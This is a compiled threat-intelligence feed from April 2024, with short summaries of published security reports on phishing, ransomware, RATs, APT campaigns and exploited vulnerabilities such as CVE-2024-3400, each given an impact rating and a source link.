—
- Intel Source:
- ASEC
- Intel Name:
- Surge_in_Phishing_Attacks_Impersonating_Korean_Websites
- Date of Scan:
- 2024-04-22
- Impact:
- MEDIUM
- Summary:
- AhnLab’s Security Intelligence Center (ASEC) has identified a significant rise in phishing attempts mimicking Korean portal websites, logistics brands, and webmail login pages. These attacks utilize sophisticated tactics, such as replicating the appearance of legitimate websites and leveraging NoCodeForm for credential exfiltration.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- A_Malicious_PDF_File_Using_to_Deliver_Malware
- Date of Scan:
- 2024-04-22
- Impact:
- LOW
- Summary:
- Researchers at SANS have noted that billions of PDF files are shared on a regular basis, and that many individuals take these files for trust because they believe they are “read-only” and contain just “a bunch of data”. Previously, PDF viewers were vulnerable to nasty vulnerabilities in poorly crafted PDF files. Particularly the Acrobat or FoxIt readers, they were all impacted at least once. Additionally, a PDF file can be rather “dynamic” by containing embedded JavaScript scripts, auto-open actions that cause scripts (like PowerShell on Windows) to run, or any other kind of embedded data.
Source:
https://isc.sans.edu/diary/Malicious+PDF+File+Used+As+Delivery+Mechanism/30848/
—
- Intel Source:
- Microsoft
- Intel Name:
- Microsoft_Defender_Exposes_Kubernetes_Vulnerabilities
- Date of Scan:
- 2024-04-22
- Impact:
- LOW
- Summary:
- Microsoft Defender recently identified a significant attack targeting Kubernetes workloads leveraging critical vulnerabilities in OpenMetadata for cryptomining. Exploiting flaws disclosed on March 15, 2024, attackers gained access to Kubernetes clusters, executed reconnaissance commands, and deployed cryptomining malware. Microsoft recommends updating OpenMetadata to version 1.3.1 or later, provides guidance for vulnerability checks, and highlights the role of Defender for Cloud in detecting and mitigating such threats, underlining the importance of proactive security measures in containerized environments.
—
- Intel Source:
- Securelist
- Intel Name:
- The_APT_group_ToddyCat_compromise_infrustructure
- Date of Scan:
- 2024-04-22
- Impact:
- LOW
- Summary:
- This month, Securelist researchers ran an investigation on how attackers got constant access to compromised infrastructure, what information on the hosts they are interested in, and what tools they used for it. ToddyCat is a threat actors group that in general targets governmental organizations located in the Asia-Pacific region. The group’s main goal is to steal sensitive information from hosts.
Source:
https://securelist.com/toddycat-traffic-tunneling-data-extraction-tools/112443/
—
- Intel Source:
- CERT-UA
- Intel Name:
- Sandworm_Groups_Cyber_Scheme
- Date of Scan:
- 2024-04-22
- Impact:
- LOW
- Summary:
- Researchers at CERT-UA found that the Sandworm group had a plan to mess with almost 20 important places in March 2024. They wanted to mess up the computer systems that control energy, water, and heat in different parts of Ukraine. CERT-UA also found out that three supply chains were messed with, either because of weak software or because employees from the supplier could get into the systems.
—
- Intel Source:
- Ars Technica
- Intel Name:
- Phishing_campaign_attacks_LastPass_users
- Date of Scan:
- 2024-04-19
- Impact:
- LOW
- Summary:
- The article discusses a recent phishing attack that targeted users of the password manager LastPass. The attack utilized a sophisticated phishing-as-a-service kit called CryptoChameleon, which provided all the necessary resources to deceive even knowledgeable individuals into revealing their master passwords. The attackers used a combination of email, SMS, and voice calls to trick victims into giving up their login credentials. LastPass was just one of the many sensitive services targeted by CryptoChameleon, and the attack was able to bypass multi-factor authentication. The section also mentions previous attacks on LastPass and offers tips for preventing these types of scams from being successful.
—
- Intel Source:
- SOC Radar
- Intel Name:
- Security_Risks_in_OpenMetadata
- Date of Scan:
- 2024-04-19
- Impact:
- LOW
- Summary:
- Researchers from Microsoft have discovered the critical vulnerabilities within the OpenMetadata platform, an open-source system designed to manage metadata across various data sources. These vulnerabilities affect versions of OpenMetadata earlier than 1.3.1, potentially allowing attackers to bypass authentication and execute Remote Code Execution (RCE).
Source:
https://socradar.io/openmetadata-attackers-cryptomine-in-kubernetes/
—
- Intel Source:
- Avast
- Intel Name:
- Technical_Analysis_of_Lazarus_Groups_Sophisticated_Attack_Chain_Targeting_Asian_Individuals
- Date of Scan:
- 2024-04-19
- Impact:
- LOW
- Summary:
- Avast’s investigation uncovers a sophisticated campaign by the Lazarus group targeting individuals in Asia with fabricated job offers. The attack, employing fileless malware and multi-layered loaders, showcases advanced evasion techniques and intricate C&C communication. The involvement of the Kaolin RAT highlights the group’s commitment to control and data extraction.
—
- Intel Source:
- picussecurity
- Intel Name:
- Threat_Landscape_Update_Exploits_and_Breaches
- Date of Scan:
- 2024-04-19
- Impact:
- LOW
- Summary:
- The Red Report 2024 by Picus Security include critical vulnerabilities exploited by threat actors, such as PAN-OS command injection and PuTTY SSH client vulnerability, alongside targeted attacks by groups like IntelBroker and Sandworm
—
- Intel Source:
- Stairwell
- Intel Name:
- The_CVE_2024_31497_PuTTY_vulnerability
- Date of Scan:
- 2024-04-19
- Impact:
- LOW
- Summary:
- In the Stairwell blog, the analysts discuss the details of a vulnerability, CVE-2024-31497, found in the PuTTY SSH libraries by researchers at Ruhr University Bochum. It allows attackers to access private keys used in key-based authentication. The blog provides a list of potentially vulnerable software, known vulnerable hashes, and a YARA rule for detection, and mentions the importance of quickly addressing supply chain vulnerabilities. The background of the vulnerability is explained, along with a list of potentially vulnerable software not mentioned in the NIST advisory.
—
- Intel Source:
- CERT-UA
- Intel Name:
- Malicious_Attack_Targeting_Defense_Forces_of_Ukraine
- Date of Scan:
- 2024-04-19
- Impact:
- MEDIUM
- Summary:
- The Government Computer Emergency Response Team of Ukraine (CERT-UA) has issued an urgent alert regarding a targeted cyber attack on a computer within the Defense Forces of Ukraine. The attack involves the distribution of a malicious file named “Support.rar” via the Signal messenger, purportedly under the guise of document submission for UN Peace Support Operations. This file contains an exploit for a WinRAR software vulnerability (CVE-2023-38831). Upon successful exploitation, a CMD file is executed, initiating PowerShell scripts associated with the COOKBOX malware.
—
- Intel Source:
- Seqrite
- Intel Name:
- Unveiling_Ghost_Locker_2
- Date of Scan:
- 2024-04-19
- Impact:
- LOW
- Summary:
- Seqrite researchers have discovered the two versions of the Ghost Locker ransomware during their threat hunting activities. The initial variant, coded in Python, secures its presence by replicating itself in the Windows Startup directory and utilizes AES encryption to lock files. This variant communicates with a C2 server to dispatch ransom demands and extract data. The subsequent variant, mostly developed in Golang, mirrors the characteristics of the first iteration but distinguishes itself in terms of C2 server interactions and operational procedures. Moreover, it incorporates mechanisms to evade detection and carefully chooses files for encryption and data extraction.
—
- Intel Source:
- NSFOCUS
- Intel Name:
- Palo_Alto_Networks_Fixes_Critical_Command_Injection_Vulnerability_in_PAN_OS_Firewall
- Date of Scan:
- 2024-04-19
- Impact:
- LOW
- Summary:
- NSFOCUS CERT has detected a critical command injection vulnerability (CVE-2024-3400) in Palo Alto Networks’ PAN-OS firewall operating system. Unauthenticated attackers could exploit this flaw to execute arbitrary code with root privileges on affected firewalls. Palo Alto Networks has released security updates addressing this vulnerability, with the PoC already public and actively exploited. The CVSS score of 10.0 underscores the severity of the issue. Users are urged to upgrade to patched versions immediately.
Source:
https://nsfocusglobal.com/palo-alto-networks-pan-os-command-injection-vulnerability-cve-2024-3400/
—
- Intel Source:
- Thehackernews
- Intel Name:
- Malvertising_Campaign_Leveraging_Google_Ads_Distributes_MadMxShell_Backdoor
- Date of Scan:
- 2024-04-18
- Impact:
- MEDIUM
- Summary:
- Zscaler ThreatLabz researchers have uncovered a sophisticated malvertising campaign utilizing Google Ads to distribute a previously unknown backdoor named MadMxShell. The campaign involves the registration of multiple domains resembling legitimate IP scanner software, which are then promoted through Google Ads to target specific search keywords. Victims who visit these sites are tricked into downloading a malicious file disguised as IP scanner software. Once executed, the malware employs DLL side-loading and process hollowing techniques to infect systems, ultimately establishing a backdoor for gathering system information and performing malicious activities.
Source:
https://thehackernews.com/2024/04/malicious-google-ads-pushing-fake-ip.html
—
- Intel Source:
- Securelist
- Intel Name:
- Unveiling_the_DuneQuixote_Malware_Campaign
- Date of Scan:
- 2024-04-18
- Impact:
- LOW
- Summary:
- Researchers at Securelist have discovered a new malware campaign named “DuneQuixote,” specifically aimed at government organizations within the Middle East. This campaign comprises more than 30 dropper samples, each carrying a backdoor labeled “CR4T.” The primary objective of this malware is to secretly infiltrate and manage compromised systems.
—
- Intel Source:
- CISA
- Intel Name:
- A_wide_range_of_Akira_ransomware
- Date of Scan:
- 2024-04-18
- Impact:
- HIGH
- Summary:
- According to a joint advisory from the FBI, CISA, Europol’s European Cybercrime Centre (EC3), and the Netherlands’ National Cyber Security Centre (NCSC-NL), the Akira ransomware operation has breached the networks of over 250 organizations and raked in roughly $42 million in ransom payments. Since March 2023, Akira ransomware has impacted a wide range of businesses and critical infrastructure entities in North America, Europe, and Australia. In April 2023, following an initial focus on Windows systems, Akira threat actors deployed a Linux variant targeting VMware ESXi virtual machines.
Source:
https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-109a
—
- Intel Source:
- Cisco Talos
- Intel Name:
- The_upload_of_confidential_documents_to_VirusTotal_by_OfflRouter_virus
- Date of Scan:
- 2024-04-18
- Impact:
- MEDIUM
- Summary:
- Recently, Cisco Talos discovered documents with some sensitive information from Ukraine. The documents had malicious VBA code, indicating they may be used as a trick to infect organizations. The virus, OfflRouter, has been known in Ukraine since 2015 and is still active on some Ukrainian organizations’ networks, based on over 100 original infected documents uploaded to VirusTotal from Ukraine and the documents’ upload dates.
—
- Intel Source:
- Trend Micro
- Intel Name:
- UK_Law_Enforcement_Successfully_Takes_Down_Phishing_as_a_Service_Provider_LabHost
- Date of Scan:
- 2024-04-18
- Impact:
- MEDIUM
- Summary:
- UK’s Metropolitan Police Service, in collaboration with international law enforcement agencies and private industry partners, executed an operation leading to the takedown of the notorious Phishing-as-a-Service (PhaaS) provider LabHost. LabHost, also known as LabRat, had gained notoriety since its emergence in late 2021 for offering a platform facilitating phishing attacks against numerous banks and organizations worldwide. With over 2,000 criminal users and more than 40,000 fraudulent sites deployed, LabHost posed a significant threat to global cybersecurity.
Source:
https://www.trendmicro.com/en_us/research/24/d/labhost-takedown.html
—
- Intel Source:
- McAfee
- Intel Name:
- A_new_packed_variant_of_the_Redline_Stealer_trojan
- Date of Scan:
- 2024-04-18
- Impact:
- MEDIUM
- Summary:
- Recently, McAfee telemetry data showed the details of a new variant of the Redline Stealer trojan that uses Lua bytecode to perform malicious activities. It is prevalent in various regions and is distributed through GitHub. The trojan creates persistence on infected machines and communicates through HTTP, while also being able to take screenshots and steal data. McAfee also covered the analysis of the bytecode file and the techniques used by the threat actors, including creating a mutex and retrieving information from the Windows registry.
Source:
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/redline-stealer-a-novel-approach/
—
- Intel Source:
- ASEC
- Intel Name:
- Analysis_of_Pupy_RAT
- Date of Scan:
- 2024-04-18
- Impact:
- LOW
- Summary:
- ASEC researchers discovered that many bad actors are using Pupy RAT, a tricky type of software. Pupy RAT allows them to control computers from far away and do things like stealing data and getting more control over the system. Now, it’s not just targeting Windows computers; it’s also affecting Linux systems, especially in countries like South Korea.
—
- Intel Source:
- Zscaler
- Intel Name:
- The_newly_discovered_backdoor_MadMxShell
- Date of Scan:
- 2024-04-18
- Impact:
- LOW
- Summary:
- Zscaler provided the details of a new backdoor, MadMxShell, discovered by ThreatLabz. The backdoor is delivered through a ZIP archive and uses obfuscated shellcodes to extract and decode an executable file. It also has a dropper stage and a final backdoor stage for collecting system information and executing commands. The backdoor communicates with its C2 server through DNS MX queries and responses, using a custom method to encode data.
Source:
https://www.zscaler.com/blogs/security-research/malvertising-campaign-targeting-it-teams-madmxshell
—
- Intel Source:
- Fortinet
- Intel Name:
- Botnets_Continue_Exploiting_CVE_2023_1389
- Date of Scan:
- 2024-04-17
- Impact:
- MEDIUM
- Summary:
- Fortinet researchers in their article explored patterns of the infection traffic and insights into the botnet that was exploited last year and believed to be exploited widely this month by a command injection vulnerability, CVE-2023-1389 was disclosed and a fix developed for the web management interface of the TP-Link Archer AX21 (AX1800). Recently, research has observed multiple attacks focusing on this year-old vulnerability, spotting botnets like Moobot, Miori, the Golang-based agent “AGoent,” and the Gafgyt Variant.
—
- Intel Source:
- Forescout
- Intel Name:
- A_Recent_Wild_Exploit_Campaign_Targets_Media_Company
- Date of Scan:
- 2024-04-17
- Impact:
- LOW
- Summary:
- Forescout researchers have discovered that Vedere Labs describes an exploitation effort that targets businesses using FortiClient EMS from Fortinet, which is vulnerable to CVE-2023-48788.
Source:
https://www.forescout.com/blog/connectfun-new-exploit-campaign-in-the-wild-targets-media-company/
—
- Intel Source:
- CERT-UA
- Intel Name:
- Cyber_Threats_Targeting_Ukraine_Defense_Forces
- Date of Scan:
- 2024-04-17
- Impact:
- MEDIUM
- Summary:
- Researchers at CERT-UA are actively engaged to protect against online dangers. They noticed that in 2024, a group called UAC-0184 became more active. This group tries to steal documents and chat messages from computers used by Ukraine’s Defense Forces. They often send harmful software through popular chat apps, tricking people with fake messages about legal issues or war videos.
—
- Intel Source:
- Blackberry
- Intel Name:
- Threat_actors_FIN7_attack_the_US_Automotive
- Date of Scan:
- 2024-04-17
- Impact:
- MEDIUM
- Summary:
- Blackberry’s analysts shared the examined details about the threat of phishing attacks on businesses and provided recommendations for protecting against them. It includes a case study of a recent attack by the threat group FIN7 on a U.S. automotive company. The article suggests implementing various security measures, such as employee training, multi-factor authentication, and incident response plans, to prevent and mitigate the impact of phishing attacks. It also provides a detailed analysis of the tactics and techniques used by FIN7 in their attack, as well as a list of indicators of compromise.
Source:
https://blogs.blackberry.com/en/2024/04/fin7-targets-the-united-states-automotive-industry
—
- Intel Source:
- Cado Security
- Intel Name:
- Critical_Atlassian_Flaw_Exploited_to_Deploy_Linux_Variant_of_Cerber_Ransomware
- Date of Scan:
- 2024-04-17
- Impact:
- MEDIUM
- Summary:
- Researchers at Cado Security have noticed that threat actors are using unpatched Atlassian servers as a means of distributing the Linux version of the Cerber ransomware, also known as C3RB3R. The attacks take use of a significant security flaw in the Atlassian Confluence Data Center and Server known as CVE-2023-22518 (CVSS score: 9.1), which enables an unauthorized attacker to reset Confluence and create an administrator account.
Source:
https://www.cadosecurity.com/blog/cerber-ransomware-dissecting-the-three-heads
—
- Intel Source:
- Netscope
- Intel Name:
- Evil_Ant_Ransomware
- Date of Scan:
- 2024-04-17
- Impact:
- LOW
- Summary:
- Netscope researchers shared the analysis of a new ransomware strain called Evil Ant. It targets personal folders and external drives for encryption and requires administrator privileges to function properly. It also disables Windows Defender and Task Manager, collects the victim’s IP address, and uses Fernet symmetric cryptography to encrypt files.
Source:
https://www.netskope.com/jp/blog/netskope-threat-coverage-evil-ant-ransomware
—
- Intel Source:
- Cisco Talos
- Intel Name:
- Attacks_Using_Brute_Force_to_Attack_VPN_and_SSH_Services
- Date of Scan:
- 2024-04-17
- Impact:
- MEDIUM
- Summary:
- Researchers at Cisco Talos have recently alerted about a global increase in brute-force attacks that, as of at least March 18, 2024, are targeting a variety of devices, including web application authentication interfaces, virtual private network (VPN) services, and SSH services. All of these attacks seem to be coming from anonymizing tunnels and proxies, as well as TOR exit nodes.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- The_Peril_of_Malicious_Annotations
- Date of Scan:
- 2024-04-17
- Impact:
- LOW
- Summary:
- ISC.SANS researchers provided PDF files, long considered “read-only” and benign, remain a potent vector for malware delivery. Despite improvements in PDF viewer security, malicious actors exploit features like annotations and clickable links to deceive users into downloading malware. This analysis delves into the intricacies of PDF file structure, demonstrating how attackers embed clickable zones using “/Annot” keywords to link to external URLs. The provided YARA rule offers a means to detect such malicious PDF documents
—
- Intel Source:
- Blackberry
- Intel Name:
- LightSpy_campaign_returns
- Date of Scan:
- 2024-04-16
- Impact:
- LOW
- Summary:
- Blackberry researchers shared the details of the LightSpy campaign, a mobile espionage operation targeting individuals in Southern Asia, potentially with state-sponsored involvement. The “Title-Abstract” section delves into the technical details of the malware, its Chinese origins, and the advanced techniques used. The “Abstract” section offers recommendations for individuals and organizations to protect themselves. The “LightSpy Returns” section discusses the campaign’s return with expanded capabilities and the threat actor group behind it. The article emphasizes the need for increased vigilance and robust security measures in the targeted region.
—
- Intel Source:
- Proofpoint
- Intel Name:
- Decoding_TA427
- Date of Scan:
- 2024-04-16
- Impact:
- LOW
- Summary:
- Proofpoint researchers discovered a group called TA427, who are really busy causing trouble. They pretend to be experts from North Korea in different fields like education, news, and research. They do this to trick other experts and sneak into their organizations to gather important information. TA427 has been quite successful at this and doesn’t seem to be stopping anytime soon. They’re quick to change their methods and create new identities when needed.
—
- Intel Source:
- Positive Technologies
- Intel Name:
- TA558_Worldwide_Attacks
- Date of Scan:
- 2024-04-16
- Impact:
- MEDIUM
- Summary:
- Researchers at Positive Technologies have discovered a group called TA558 has carried out over 300 attacks worldwide. They are using an old vulnerability called CVE-2017-11882 to spread malware through a campaign called SteganoAmor. This campaign is affecting users in Latin America and other parts of the world. TA558 hides malware within its attacks using a technique called steganography.
—
- Intel Source:
- PaloAlto
- Intel Name:
- Campaign_For_Contact_Forms_Distributes_SSLoad_Malware
- Date of Scan:
- 2024-04-16
- Impact:
- LOW
- Summary:
- Researchers at Palo Alto have noticed that the MSI file’s WebDAV server has stopped operating. They have observed this effort spreading Latrodectus malware in the last few weeks. But Latrodectus is not the MSI linked to this specific infection chain.
—
- Intel Source:
- Recorded Future
- Intel Name:
- The_spread_of_infostealers_by_a_Russian_cybercriminal_campaign
- Date of Scan:
- 2024-04-15
- Impact:
- LOW
- Summary:
- The Insikt Group has uncovered a large-scale Russian-language cybercrime operation that leverages fake Web3 gaming projects to distribute infostealer malware targeting both macOS and Windows users.
—
- Intel Source:
- Palo Alto, Volexity
- Intel Name:
- Zero_Day_Exploitation_of_Unauthenticated_RCE_Vulnerability_in_GlobalProtect
- Date of Scan:
- 2024-04-15
- Impact:
- HIGH
- Summary:
- Researchers at PaloAlto have identified zero-day exploitation of a vulnerability found within the GlobalProtect feature of Palo Alto Networks PAN-OS. A critical command injection vulnerability in Palo Alto Networks PAN-OS software enables an unauthenticated attacker to execute arbitrary code with root privileges on the firewall. The vulnerability, assigned CVE-2024-3400, has a CVSS score of 10.0.
Source:
https://unit42.paloaltonetworks.com/cve-2024-3400/#post-133365-_ydqdbjg0dngh
https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/
—
- Intel Source:
- Bitdefender
- Intel Name:
- Malvertising_campaigns_hijack_social_media_to_spread_stealers
- Date of Scan:
- 2024-04-15
- Impact:
- LOW
- Summary:
- Threat actors have been copying AI software such as Midjourney, Sora AI, DALL-E 3, Evoto, and ChatGPT 5 on Facebook to trick users into downloading purported official desktop versions of these AI software. The malicious webpages then download intrusive stealers such as Rilide, Vidar, IceRAT, and Nova Stealer.
—
- Intel Source:
- Esentire
- Intel Name:
- The_XWorm_Tax_Scam
- Date of Scan:
- 2024-04-12
- Impact:
- LOW
- Summary:
- Recently, Esentire SOC Analysts shared with their Threat Response Unit about the tax-themed threat delivering XWorm as the final payload. Researchers are certain the initial infection vector is via the phishing email.
Source:
https://www.esentire.com/blog/dont-take-the-bait-the-xworm-tax-scam
—
- Intel Source:
- Esentire
- Intel Name:
- A_series_of_tax_themed_phishing_emails_delivering_the_Remcos_RAT
- Date of Scan:
- 2024-04-12
- Impact:
- LOW
- Summary:
- Last month, eSentire researchers detected a series of tax-themed phishing emails delivering the Remcos RAT as the final payload through GuLoader. The phishing email contained the link to the password-protected ZIP archive hosted on Adobe Document Cloud.
Source:
https://www.esentire.com/blog/tax-season-alert-beware-of-guloader-and-remcos-rat
—
- Intel Source:
- Halcyon
- Intel Name:
- Halcyon_Threat_Insights_003
- Date of Scan:
- 2024-04-12
- Impact:
- LOW
- Summary:
- Halcyon researchers indicated and blocked a big range of threats that were missed by other security layers in their client’s environments that are often precursors to the delivery of the ransomware payload.
Source:
https://www.halcyon.ai/blog/halcyon-threat-insights-003-march-2024
—
- Intel Source:
- Esentire
- Intel Name:
- SolarMarker_malware_campaigns
- Date of Scan:
- 2024-04-12
- Impact:
- LOW
- Summary:
- This month, eSentire’s researchers discovered that SolarMarker malware campaigns now utilize PyInstaller to hide malicious PowerShell scripts, marking a shift from previous methods such as Inno Setup and PS2EXE.
Source:
https://www.esentire.com/blog/solarmarkers-shift-to-pyinstaller-tactics
—
- Intel Source:
- Seqrite
- Intel Name:
- A_New_Banking_Trojan_Called_Coyote
- Date of Scan:
- 2024-04-12
- Impact:
- LOW
- Summary:
- Researchers at Seqrite have discovered a brand-new banking trojan known as Coyote, which makes use of a tool/library known as Squirrel Installer, designed to install and control Windows application updates. The software appears to be more sophisticated than typical banking trojans, and in the coming days, it may pose a more serious threat. This recently discovered malware identifies the market it targets and targets various banking institutions in Brazil.
—
- Intel Source:
- Trellix
- Intel Name:
- Observed_spike_of_LockBit_related_activity_of_vulnerabilities_in_ScreenConnect
- Date of Scan:
- 2024-04-12
- Impact:
- MEDIUM
- Summary:
- Recently, Trellix Researchers have observed a rise in LockBit-related cyber activity in vulnerabilities in ScreenConnect. Researchers are confident that the cybercriminals group behind LockBit ransomware partially restored their infrastructure and created a feeling that the LE actions did not affect their normal operation.
—
- Intel Source:
- Sucuri
- Intel Name:
- Embedding_a_credit_card_skimmer_in_a_fake_Facebook_Pixel_tracker_script
- Date of Scan:
- 2024-04-12
- Impact:
- LOW
- Summary:
- Recently Sucuri discovered an interesting case of this: the attackers took that a step further by embedding a credit card skimmer in a well-concealed fake Facebook Pixel tracker script.
Source:
https://blog.sucuri.net/2024/04/credit-card-skimmer-hidden-in-fake-facebook-pixel-tracker.html
—
- Intel Source:
- Rapid7
- Intel Name:
- Continuation_of_execution_of_IDAT_Loader
- Date of Scan:
- 2024-04-11
- Impact:
- MEDIUM
- Summary:
- In part 2 of this series, Rapid7 continues to provide an analysis of how an MSIX installer led to the download and execution of the IDAT Loader. After they analyzed the recent tactics, techniques, and procedures observed (TTPs), Rapid7 concluded that the activity is associated with financially motivated threat groups.
—
- Intel Source:
- HP Wolf
- Intel Name:
- New_Raspberry_Robin_Malware_Campaign_Spreading_Through_WSF_Files
- Date of Scan:
- 2024-04-11
- Impact:
- HIGH
- Summary:
- HP wolf security researchers have discovered a new Raspberry Robin campaign wave that propagates the malware through malicious Windows Script Files (WSFs) since March 2024. The scripts are highly obfuscated and use a range of anti-analysis techniques, enabling the malware to evade detection.
Source:
https://threatresearch.ext.hp.com/raspberry-robin-now-spreading-through-windows-script-files/
—
- Intel Source:
- Cyble
- Intel Name:
- Active_exploitation_continues_of_critical_D_Link_NAS_vulnerability
- Date of Scan:
- 2024-04-11
- Impact:
- MEDIUM
- Summary:
- Security analysts continue to observe the exploitation of critical D-Link NAS vulnerabilities. Cyble Global Sensor Intelligence Observes Active Exploitation Of Critical D-Link NAS Vulnerabilities. The vulnerabilities, identified as CVE-2024-3272 and CVE-2024-3273 were discovered originally by some analyst who goes by the alias “netsecfish” on GitHub last month. D-Link disclosed the same on April 4, 2024. Cyble Intel network picked up ongoing exploitation attempts of these vulnerabilities from April 09 itself. This also indicates the swift weaponization of publicly available exploits by Threat Actors (TAs) targeting vulnerable internet-exposed D-Link NAS. Affected products are D-Link DNS-320L, DNS-325, DNS-327L, and DNS-340L up to 20240403.
Source:
https://cyble.com/blog/critical-d-link-nas-vulnerability-under-active-exploitation/
—
- Intel Source:
- ASEC
- Intel Name:
- Redis_Server_Used_to_Install_Metasploit_Meterpreter
- Date of Scan:
- 2024-04-11
- Impact:
- LOW
- Summary:
- Researchers from ASEC have found that the Redis service has been used to install the Metasploit Meterpreter backdoor. Redis is the shorthand for Remote Dictionary Server, an open-source in-memory database and data structure storage system. It is assumed that the threat actors employed vulnerability attacks to execute commands or exploited improper settings.
—
- Intel Source:
- Krebson Security
- Intel Name:
- The_exposure_of_Privnote_Phishing_Sites
- Date of Scan:
- 2024-04-11
- Impact:
- LOW
- Summary:
- A network of websites that mimic the self-destructing messaging service Privnote.com is being used by cybercriminals to steal cryptocurrency addresses, reports the BBC’s Yolande Knell.
Source:
https://krebsonsecurity.com/2024/04/fake-lawsuit-threat-exposes-privnote-phishing-sites/
—
- Intel Source:
- Trend Micro
- Intel Name:
- A_Continuous_Refinement_of_Waterbear_and_Deuterbear_by_Earth_Hundun
- Date of Scan:
- 2024-04-11
- Impact:
- MEDIUM
- Summary:
- Researchers at TrendMicro have noticed a significant increase in cyberattacks that are directed on numerous organizations in different industries, including government, research, and technology. The cyberespionage group Earth Hundun, also known as BlackTech, is connected to the Waterbear malware family, which is responsible for these attacks. BlackTech is a threat actor that primarily targets government and technical institutions in the Asia-Pacific area.
Source:
https://www.trendmicro.com/en_us/research/24/d/earth-hundun-waterbear-deuterbear.html
—
- Intel Source:
- Cyble
- Intel Name:
- A_sophisticated_FatalRAT_campaign_targeting_ryptocurrency_users
- Date of Scan:
- 2024-04-11
- Impact:
- MEDIUM
- Summary:
- Cyble researchers discovered a new phishing campaign aimed at cryptocurrency users. This campaign used a known FatalRAT and additional malware such as Clipper and Keylogger. The TAs target Chinese-speaking individuals or organizations, as evidenced by using Chinese-language installers. FatalRAT is a Remote Access Trojan that gives attackers control over the victim’s computer and is equipped with extensive capabilities for stealing sensitive information.
Source:
https://cyble.com/blog/fatalrats-new-prey-cryptocurrency-users-in-the-crosshairs/
—
- Intel Source:
- Seqrite
- Intel Name:
- The_Rapid_Rise_of_Abyss_Locker_Ransomware
- Date of Scan:
- 2024-04-11
- Impact:
- MEDIUM
- Summary:
- Seqrite researchers have noticed that a recently launched ransomware operation called Abyss Locker has quickly taken aim at businesses and grown to be a serious threat to a variety of industries, including public sector organizations, businesses, and industrial control systems (ICS). It is a serious risk to Linux and Windows systems both.
Source:
https://www.seqrite.com/blog/unveiling-abyss-locker-the-rapid-rise-of-a-menacing-ransomware-threat/
—
- Intel Source:
- CERT-AGID
- Intel Name:
- Credentials_Forwarded_to_Telegram_Bot_in_PEC_Phishing_Campaign
- Date of Scan:
- 2024-04-11
- Impact:
- LOW
- Summary:
- Researchers from CERT-AGID have discovered a phishing campaign that aims to get credentials for Certified Electronic Mail (PEC) boxes through fraud. An email containing false information is sent to PEC account holders to carry out fraudulent operations. The email notification warns of a said account deactivation request that must be performed within 24 hours and proposes clicking on a link provided in the message’s body if the receiver believes this is an error.
Source:
https://cert-agid.gov.it/news/campagna-di-phishing-pec-credenziali-inoltrate-ad-un-bot-telegram/
—
- Intel Source:
- sophos
- Intel Name:
- Exposing_Smoke_and_Screen_Mirrors_Backdoor
- Date of Scan:
- 2024-04-10
- Impact:
- LOW
- Summary:
- Researchers at Sophos have investigated the finding of a trick backdoor hidden in an executable file that was disguising itself as a genuine Microsoft Hardware Publisher Certificate. The analysis reveals the backdoor’s association with LaiXi Android Screen Mirroring, a software package that appears benign at first glance. It also reveals the strategies threat actors use to avoid discovery.
Source:
https://news.sophos.com/en-us/2024/04/09/smoke-and-screen-mirrors-a-strange-signed-backdoor/
—
- Intel Source:
- Strikeready
- Intel Name:
- Activity_of_Sidewinder_Threat_Group
- Date of Scan:
- 2024-04-10
- Impact:
- MEDIUM
- Summary:
- This in-depth examination explores the methods used by the cybersecurity experts to locate and identify infrastructure connected to the Sidewinder threat organization. It describes a broad architecture with several search queries applied to different data sources with the goal of finding signs and artifacts associated with the adversary’s activities. The methodology consists of searching for particular strings, payloads that have been encoded, network fingerprints, and using intelligence feeds to find new domains, IPs, and possible infrastructure that the group uses for command and control.
Source:
https://blog.strikeready.com/blog/rattling-the-cage-of-a-sidewinder
—
- Intel Source:
- Checkmarx
- Intel Name:
- Hackers_Using_New_Technique_to_Trick_Developers_in_Open_Source_Supply_Chains
- Date of Scan:
- 2024-04-10
- Impact:
- MEDIUM
- Summary:
- Researchers at Checkmarx have examined the concerning practice of hackers using GitHub’s search feature to spread malware. Secretly creating repositories with well-known names and subjects, attackers trick unsuspecting users into downloading and running harmful programs.
—
- Intel Source:
- Proofpoint
- Intel Name:
- TA547_Targets_German_Organizations_with_Rhadamanthys_Malware
- Date of Scan:
- 2024-04-10
- Impact:
- LOW
- Summary:
- Proofpoint researchers have discovered a group called TA547 is sending emails to German organizations with Rhadamanthys malware. This malware steals information and is used by many cybercriminals. The group also seems to be using a PowerShell script possibly created by large language models like ChatGPT or Gemini.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- A_potential_threat_detected_in_the_customer_environment
- Date of Scan:
- 2024-04-10
- Impact:
- LOW
- Summary:
- The senior SecOps analyst recently discussed a potential threat detected in our environment. It started with the investigation of a group called Wazawaka and after a study of Wazawaka’s activities, the threat-hunting team created numerous SentinelOne queries to detect similar activity. Although the threat-hunting team concluded that this activity was not a result of Wazawaka, they decided to continue further investigation.
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Malicious_Campaign_Targeting_System_Administrator_With_Nitrogen_Malware
- Date of Scan:
- 2024-04-10
- Impact:
- LOW
- Summary:
- Malwarebytes Labs researchers have observed an ongoing campaign targeting at system administrators through fake ads for well-known system tools. These ads pop up as sponsored links on Google searches, mainly in North America. Victims are lured into downloading what appears to be PuTTY or FileZilla installers but are actually Nitrogen malware. This malware allows hackers to breach networks, steal data, and introduce ransomware like BlackCat/ALPHV.
—
- Intel Source:
- Sysdig
- Intel Name:
- An_Established_Romanian_APT_Group_RUBYCARP
- Date of Scan:
- 2024-04-10
- Impact:
- LOW
- Summary:
- Sysdig researchers have uncovered a persistent botnet maintained by a Romanian threat actor group which they are referring to as RUBYCARP. This threat actor appears to have been active for a minimum of ten years based on the evidence. Its main mode of operation makes use of a botnet that has been set up through a number of open exploits and brute force attacks. The group uses both public and secret IRC networks for communication. It also creates cyberweapons and target databases. Finally, it employs its botnet to mine cryptocurrency and send phishing scams.
Source:
https://sysdig.com/blog/rubycarp-romanian-botnet-group/
—
- Intel Source:
- Perception-Point
- Intel Name:
- Phishing_campaign_targets_LinkedIn_users
- Date of Scan:
- 2024-04-09
- Impact:
- LOW
- Summary:
- This blog highlights a new LinkedIn threat, one that combines breached accounts and an evasive 2-step phishing attack.
—
- Intel Source:
